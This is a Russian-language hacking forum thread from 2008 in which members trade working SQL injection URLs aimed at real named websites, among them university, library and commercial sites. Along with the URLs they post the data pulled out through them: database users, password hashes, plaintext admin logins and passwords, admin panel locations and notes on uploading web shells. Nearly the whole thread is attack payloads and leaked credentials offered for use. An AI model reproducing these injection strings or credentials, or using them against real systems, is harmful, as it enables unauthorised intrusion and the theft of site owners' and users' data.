SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    Разные разности:
    Code:
    http://www.owensound.library.on.ca/news-full.php?NewsID=99999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9/*
    http://www.spec.bc.ca/news/news.php?newsID=999999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7--
    http://www.1049thebeach.ca/news_item.php?NewsID=9999999+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17,18,19,20,21,22/*
    http://www.nlc.bc.ca/public.news.php?NewsActiveList=newsdetails&NewsID=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14/*
    http://www.onlc.ca/newsfull.php?NewsID=999999+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9/*
    http://www.myheritage.es/FP/newsItem.php?s=786&newsID=99999+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11/*&sourceList=dir
    http://www.vibez.us/en/products/detail_mp3.php?pid=99999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*&page=3
    http://www.park-ridge.il.us/record.php?_ID=99999+union+select+1,concat_ws(0x3a,username,PASSWORD,ip),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+prkhome_ciab.ciab_member
    
     
    1 person likes this.
  2. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    Magazine

    Code:
    http://online-market.com.ua/stat_info.php?id=99999+union+select+1,version(),3,4/*
    version: 5.0.41-community-log
    user: onlinem_user@localhost
    database: onlinem_base

    Code:
    http://www.fangoria.com/fearful_feature.php?id=99999'+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15/*
    version: 5.0.22
    user: fango_site@localhost
    database: joesena_fangoria

    Онлайн аукционы

    Code:
    http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,version(),4,5,6,7/*
    version: 5.0.45-log
    user: [email protected]
    database: u72447

    Code:
    http://www.elcom.md/news.php?id=99999+union+select+1,2,version(),4,5,6,7/*
    version: 5.0.27
    user: 17325@localhost
    database: 17325
     
    1 person likes this.
  3. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    тИЦ = 750

    Code:
    http://rezonans.info/index.php?p=news&nID=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
    version() - 5.0.45
    database() - admin_smi
    user() - admin_smi@localhost

    --------------------------------------------
    тИЦ = 230

    Code:
    http://www.womanineurope.com/beauty/show_fashion.php?cat=news&fnr=-1+union+select+1,version(),user(),4,5,database(),7/*
    version() - 4.0.27-max-log
    database() - db125240836
    user() - [email protected]

    --------------------------------------------
    Code:
    http://www.michiganbusiness.us/showcompany.php?id=-1%0Aunion%0Aselect%0A1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--
    version() - 4.0.27-standard
    user() - michigan_michiga@localhost
    database() - michigan_mbusiness
     
    #6683 bons, 26 Oct 2008
    Last edited: 26 Oct 2008
    2 people like this.
  4. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    Code:
    http://www.grably.ru/restaurants?id=9999+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,0,1,2,3,4,5,6+from+INFORMATION_SCHEMA.TABLES--
    
    Code:
    http://www.specialradio.ru/mkz/?id=-1+union+select+1,version(),3,user(),5,6,7,8,9--
    
     
  5. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    Цитрус

    Компания по разработке сайтов. Уязвимость в их CMS.
    Пример:
    Панель администратора:
    КирИТас

    Компания по разработке сайтов.Уязвимость в CMS на сайте.
    Пример:
    Панель администратора:
     
    #6685 $p01nt, 26 Oct 2008
    Last edited: 26 Oct 2008
  6. foopi

    foopi Member

    Joined:
    26 Oct 2008
    Messages:
    41
    Likes Received:
    20
    Reputations:
    5
    У меня такая проблема - когда ввожу такую строку
    http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,password,4,5,6,7+from+members
    выдаёт вот такую ошибку - Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_swedish_ci,IMPLICIT) for operation 'UNION'
    ОДнако на такой запрос
    http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,id,4,5,6,7+from+members - реагирует нормально. может быть кто-нибудь знает как эту фигню обойти??
     
  7. foopi

    foopi Member

    Joined:
    26 Oct 2008
    Messages:
    41
    Likes Received:
    20
    Reputations:
    5
    проблему решил!гугл помог. Если кому интересно , составил такой запрос
    http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,convert(password+using+cp1251),4,5,6,7+from+members на что получил хэши пользователей)
     
  8. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    foopi
    tables with passwords
    http://bestwayusa.ru/maillist/admin/?page=configure
    http://bestwayusa.ru/chatlive/admin
    http://bestwayusa.ru/dealer_login.php

    http://bestwayusa.ru/admin.php

    didnt find password in db
     
    #6688 sabe, 26 Oct 2008
    Last edited: 26 Oct 2008
  9. foopi

    foopi Member

    Joined:
    26 Oct 2008
    Messages:
    41
    Likes Received:
    20
    Reputations:
    5

    Только я одного не могу понять ты эти ссылки сам находиш или через скулю узнаёшь??
     
    1 person likes this.
  10. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    foopi
    сам) что там находить то ? по сайту 5 мин полазить ?
     
  11. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    Code:
    http://www.sil.org/silepubs/abstract.asp?id=1%27+or+1=@@VERSION--
    
    таблицы:
    Code:
    'dtproperties','bibliography','CountriesList','Country_Index','Language_Index','LanguagesList','name_index','Serials_Index','Serials_List','SIL_Epubs','subject_code_categories','Subject_index','sysconstraints','syssegments'
    
     
  12. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    4.1.18

    4.1.22-standard
     
    2 people like this.
  13. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    4.1.22-standard-log
     
    1 person likes this.
  14. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    по традиции, продолжаем серию .edu

    North Carolina Agricultural and Technical State University
    Code:
    http://www.ncat.edu/press_releases/disp_release.php?ID=-2930+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(user,0x3a,password,0x3a,host),17,18+from+mysql.user+limit+1,1/*
    4.0.12-standard
    PR=8
    ----------------------------------------------------------------

    Stanford
    Code:
    http://ed.stanford.edu/suse/news-bureau/displayRecord.php?tablename=susenews&id=-71+union+select+1,concat(user,0x3a,password,0x3a,host),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+mysql.user+limit+22,1/*
    5.0.22
    PR=7
    ---------------------------------------------------------------

    COMET Outreach Program
    Code:
    http://www.comet.ucar.edu/outreach/details.php?id=-2126+union+select+1,concat(username,0x3a,password),version(),4,5,6,7,8,9,10,11,12,13,14,15,16+from+users/*
    vickie:comet(х.з. откуда...)
    5.0.26-log
    PR=6

    На сайте имеется мини-квест с java технологиями =) (кто пройдет, отпишитесь, ок? )
    Code:
    http://strc.comet.ucar.edu/documents/login.htm
    ------------------------------------------------------------

    Tufts University
    Code:
    http://inside.tufts.edu/announce/index.php?t=id&id=640+union+select+1,2,unhex(hex(version())),4,5,6,7,8+from+users/*
    4.1.14-log
    PR=6
     
    2 people like this.
  15. xPriZrAkx

    xPriZrAkx Member

    Joined:
    16 Mar 2007
    Messages:
    8
    Likes Received:
    8
    Reputations:
    0
    Неподходит логин и пасс, думаю из за того что он от шопа, в базе ковырялся, так и не нашел, может кому то из вас повезет.

    dca1:dertg1
     
    2 people like this.
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    да нет, просто там защита .htaccess, к базе никакого отношения не имеет
     
  17. xPriZrAkx

    xPriZrAkx Member

    Joined:
    16 Mar 2007
    Messages:
    8
    Likes Received:
    8
    Reputations:
    0
    5.0.51a-community
    onlymelb@localhost
    onlymelb_melbourne

    Больше ничего нашел интересного кроме как:
    228 - таблиц
    14633 - мыл
    emails = 170 таблица

    Админка:
    Code:
    http://www.onlymelbourne.com.au/admin1.htm
    Login: alan
    Pass: jaxons2008


    ------------------------------------------------------------------------------------------------------------------------

    5.0.45-log
     
    #6697 xPriZrAkx, 29 Oct 2008
    Last edited: 29 Oct 2008
  18. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    Скули из таблицы user базы mysql (5 шт.)


    zq16167 ; 22f421104e6fdb11
    Вот, и с MySQL паролик вытащили.
    Проверьте, если есть желание...
    просто пароль в публичной базе не нашел, а брутить... =(

    yroot ; 135a94ef50ef2ac7
    http://www.medtechmammography.com/admin/ - phpMyAdmin 2.5.0
    (PR 2)

    root ; 7eba08fa3d983a6b
    (PR 2)

    root ; 39d5d18a469d0dc5
    (PR 3)

    root ; 41bb620c59bba24e
    хеш не подобрал

    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

    Скули с админками (12 шт.):

    Админ форума - Tof ; d780ef00c2edaf2f26f92e06a0db5f30 пароль - 5275326

    Стоит phpBB форум! Вот логин;хеш админа, хеш подобрать не смог!
    admin;9fed66b17b90086737f7718f83f2c6dd
    Более 2600 зареганых пользователей

    http://www.doctordans.com/login.php
    DanFanselow ; nae2Itha
    Очень хорошо льется шелл =)

    chiefadmin ; chief
    http://www.haltonheritage.com/admin/
    Отлично льется шелл (Если его под видом pdf приаттачивать! =))
    есть доступ к соседним сайтикам... короче интересное место! =)
    (PR 2)


    http://www.atlascaptives.com/admin/
    atlas ; 9455556
    (PR 3)

    admin ; al-nafeh
    http://www.al-nafeh.com/admin/login.php
    (PR 2)

    Логин - dinesh
    хеш - 9c9f1c65b1dc1f79498c9f09eb610e1a
    Пароль - dinesh

    http://www.techaltar.com/admin/
    (PR 0)

    mstaton ; goofy1
    Есть админка, но пароль туда не подходит... =(
    http://www.mickstaton.com/admin/
    (PR 3)

    http://www.switchvfx.com/en/admin/
    switchadmin ; w3bt3@m
    Неполадки с сервером MySQL

    Randy53215 ; b1e0d66c6238a74d0c22f1e7576e797f
    Подобрать хеш не смог!
    Кстати, там какая то бага с авторизацией! При первом заходе я зашел под каким то юзверем,
    и по глупости вышел, а рега не работает! =(
    (PR 1)

    admin ; st0pkran
    http://antikwar.by/admin/login.php
    пароль почему то не подходит...

    http://www.hmc.edu/admin/
    не работает! =(
    (PR корневого сайта - 7, субдомена - 4)

    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

    Всякие-разные скули (28 шт.):

    ::::::::::::::::::::::::::::: Украина :::::::::::::::::::::::::::::

    ::::::::::::::::::::::::::::: Зона .com :::::::::::::::::::::::::::::

    (PR ???)

    (PR 0)

    (PR 0)

    (PR 3)

    (PR 4)

    админка похоже тут http://carlighthouse.com/admin/login.php
    Но что то пока не пашет!
    (PR 0)

    (PR 4)

    (PR 1)

    ::::::::::::::::::::::::::::: Зона .net :::::::::::::::::::::::::::::

    (PR 3)

    (PR 1)

    (PR 3)
    ::::::::::::::::::::::::::::: Англия :::::::::::::::::::::::::::::

    Есть админка, нерабочая, дальше искать не стал.
    http://www.cedexx.co.uk/admin/

    Админку не нашел
    ::::::::::::::::::::::::::::: Австралия :::::::::::::::::::::::::::::

    Вот тут непонятно... из information_schema достает, а из своей не хочет... странно...

    Не смог подобрать таблицу юзверей! Вероятнее всего стоит префикс...

    ::::::::::::::::::::::::::::: Белоруссия :::::::::::::::::::::::::::::

    Также не смог подобрать таблицу... =(


    http://noutbuk.by/admin/
    Также не смог подобрать таблицу... =(

    ::::::::::::::::::::::::::::: Италия :::::::::::::::::::::::::::::

    хм... странный сайт... из базы достает юзеров а пароли нет... рут переименовал столбец чтоли...

    ::::::::::::::::::::::::::::: Зона .info :::::::::::::::::::::::::::::

    http://tipsforliving.info/admin/
    Админка похоже закрыта .htaccess по ip... =(


    Итого: 45 скулей! =)

    P.S. Если есть неточности, пожалуйста сообщите, скули были найдены несколько дней назад, мошли измениться пароли и т.п.
     
    5 people like this.
  19. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    MySQL Version: 5.0.17-nt-log
     
    #6699 InFlame, 29 Oct 2008
    Last edited: 29 Oct 2008
    2 people like this.
  20. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    Code:
    http://www.persiandel.com/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude--
    Code:
    http://www.reper.ru/rus/index.php?catid=-91%20union%20select%201,2,3,version(),5,6,7,8,9,0,1,2,3,4%20admin/*
     
    #6700 kair, 29 Oct 2008
    Last edited: 29 Oct 2008
    1 person likes this.
Thread Status:
Not open for further replies.